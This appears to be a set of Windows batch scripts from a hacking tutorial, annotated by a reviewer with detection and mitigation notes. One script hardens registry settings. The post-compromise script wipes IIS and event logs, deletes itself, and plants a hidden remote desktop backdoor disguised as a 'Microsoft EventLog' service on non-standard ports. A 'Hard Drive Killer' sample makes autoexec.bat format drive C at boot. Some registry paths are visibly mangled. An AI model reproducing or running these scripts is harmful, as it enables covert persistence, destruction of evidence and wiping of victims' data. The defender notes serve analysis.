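@REM Writes a set of host-hardening registry values to a .reg-format text
@REM file and imports it silently with "regedit /s". Every key is under
@REM HKEY_LOCAL_MACHINE, so this needs administrative rights.
@REM Key paths use single backslashes, which the .reg format requires; the
@REM listing as published had them doubled into forward slashes.
@REM NOTE(review): the output is .reg text stored under the name patch.dll.
@REM A text file with a .dll extension passed to "regedit /s" looks like
@REM masquerading to monitoring tools; prefer a .reg name in managed use.
@REM NOTE(review): "regedit /s" reports nothing on failure, so verify the
@REM values afterwards. Service and share settings presumably apply only
@REM after the affected service restarts or the machine reboots - confirm.
@echo Windows Registry Editor Version 5.00 >patch.dll

@REM [disable the automatic administrative shares]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll

@REM [restrict anonymous logon]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll

@REM [disable file access and print sharing over the NetBT SMB device]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll

@REM Start=4 marks a service as disabled. The published key name for the
@REM first service read "@REMoteRegistry", a search-and-replace artifact;
@REM the service is RemoteRegistry.
@REM NOTE(review): disabling Schedule (Task Scheduler) and RemoteRegistry can
@REM break management tooling that relies on them - confirm before rollout.
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll

@REM [no shutdown before logon; do not show the last logged-on user name]
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@echo "DontDisplayLastUserName"="1" >>patch.dll

@REM Import the generated file without prompting.
@regedit /s patch.dll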
------------------------ cut here then save as .bat or .cmd file --------------------------- 

下面的命令是清除肉鸡上的所有日志,禁止一些危险的服务,并修改肉鸡的terminal service,留条后路。
@REM NOTE(review): post-compromise cleanup script, kept exactly as published
@REM so it can be analysed. It has three parts: log deletion, stopping of
@REM the Server / Task Scheduler / Remote Registry services, and registry
@REM values for a Terminal Services listener disguised as an event-log
@REM service. Defender notes are added per part; the code is unchanged.
@regedit /s patch.dll
@REM Part 1 - log removal. Issues "net stop" for the IIS web service (w3svc)
@REM and for "event log", deletes files in the w3svc1 / w3svc2 log folders,
@REM *.event files in the config folder, the dtclog folder, and *.txt / *.log
@REM in the Windows directory, then starts the services again.
@REM Detection: a web or logging service stop followed at once by bulk
@REM deletes in log directories, and unexplained gaps in log timelines.
@REM Mitigation: forward logs off-host so local deletion cannot erase them.
@net stop w3svc
@net stop event log
@del c://winnt//system32//logfiles//w3svc1//*.* /f /q
@del c://winnt//system32//logfiles//w3svc2//*.* /f /q
@del c://winnt//system32//config//*.event /f /q
@del c://winnt//system32dtclog//*.* /f /q
@del c://winnt//*.txt /f /q
@del c://winnt//*.log /f /q
@net start w3svc
@net start event log
@rem [delete logs]


@REM Part 2 - stops lanmanserver (Server), Schedule and RemoteRegistry, then
@REM deletes its own staging files patch.dll and patch.bat. Because the
@REM script removes itself, the absence of these files on disk proves
@REM nothing; rely on service state, registry contents and process logs.
@net stop lanmanserver /y
@net stop Schedule /y
@net stop RemoteRegistry /y
@del patch.dll
@echo The server has been patched,Have fun.
@del patch.bat
@REM [disable some dangerous services.]

@REM Part 3 - registry values appended to patch.dll for a hidden remote
@REM desktop listener. Artifacts to hunt for, all visible in the lines below:
@REM   - "PortNumber" under the RDP-Tcp and Tds\tcp keys set to 0x2010 (8208)
@REM     and 0x2012 (8210) instead of the default 3389
@REM   - a service key named SecuService with DisplayName "Microsoft EventLog",
@REM     Start=2 (automatic), ObjectName LocalSystem
@REM   - its ImagePath, which decodes from the UTF-16 hex bytes to
@REM     %SystemRoot%\System32\eventlog.exe
@REM   - the genuine termservice key set to Start=4 (disabled)
@REM   - an eventlog.exe in system32 that is a copy of termsrv.exe; compare
@REM     file hashes or version information of the two
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//WinStations//RDP-Tcp] >>patch.dll
@echo "PortNumber"=dword:00002010 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Control//Terminal Server//Wds//rdpwd//Tds//tcp >>patch.dll
@echo "PortNumber"=dword:00002012 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//TermDD] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//SecuService] >>patch.dll
@echo "Start"=dword:00000002 >>patch.dll
@echo "ErrorControl"=dword:00000001 >>patch.dll
@echo "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,// >>patch.dll
@echo 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,// >>patch.dll
@echo 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00 >>patch.dll
@echo "ObjectName"="LocalSystem" >>patch.dll
@echo "Type"=dword:00000010 >>patch.dll
@echo "Description"="Keep record of the program and windows message。" >>patch.dll
@echo "DisplayName"="Microsoft EventLog" >>patch.dll
@echo [HKEY_LOCAL_MACHINE//SYSTEM//CurrentControlSet//Services//termservice] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@copy c://winnt//system32//termsrv.exe c://winnt//system32//eventlog.exe
@REM [change the 3389 connection: port 8210 (hex 00002012), service name Microsoft EventLog, leaving a way back in]

3.Hard Drive Killer Pro Version 4.0(玩批处理到这个水平真的不容易了。) 
------------------------ cut here then save as .bat or .cmd file --------------------------- 
@echo off
rem NOTE(review): destructive sample, kept exactly as published so it can be
rem analysed; the listing on this page stops after the drive-list setup.
rem Original author's note follows.
rem This program is dedicated to a very special person that does not want to be named.
:start
cls
rem Decoy status message shown while the boot file is being rewritten.
echo PLEASE WAIT WHILE PROGRAM LOADS . . .
rem Clears the read-only and hidden attributes on autoexec.bat on drive c,
rem overwrites the file, writes a line that invokes "format c:" into it, and
rem then sets read-only + hidden again so the change is less visible.
rem Detection: any write to, or attribute change on, the root autoexec.bat;
rem on DOS / Windows 9x family systems that file runs at the next boot.
rem Mitigation: inspect the file before rebooting a suspect machine and keep
rem offline backups.
call attrib -r -h c://autoexec.bat >nul
echo @echo off >c://autoexec.bat
echo call format c: /q /u /autoSample >nul >>c://autoexec.bat
call attrib +r +h c://autoexec.bat >nul
rem Drive checking and assigning the valid drives to the drive variable.

rem Clears "drive" and sets "alldrive" to the candidate letters c through z.
set drive=
set alldrive=c d e f g h i j k l m n o p q r s t u v w x y z

rem code insertion for Drive Checking takes place here.
rem drivechk.bat is the file name under the root directory.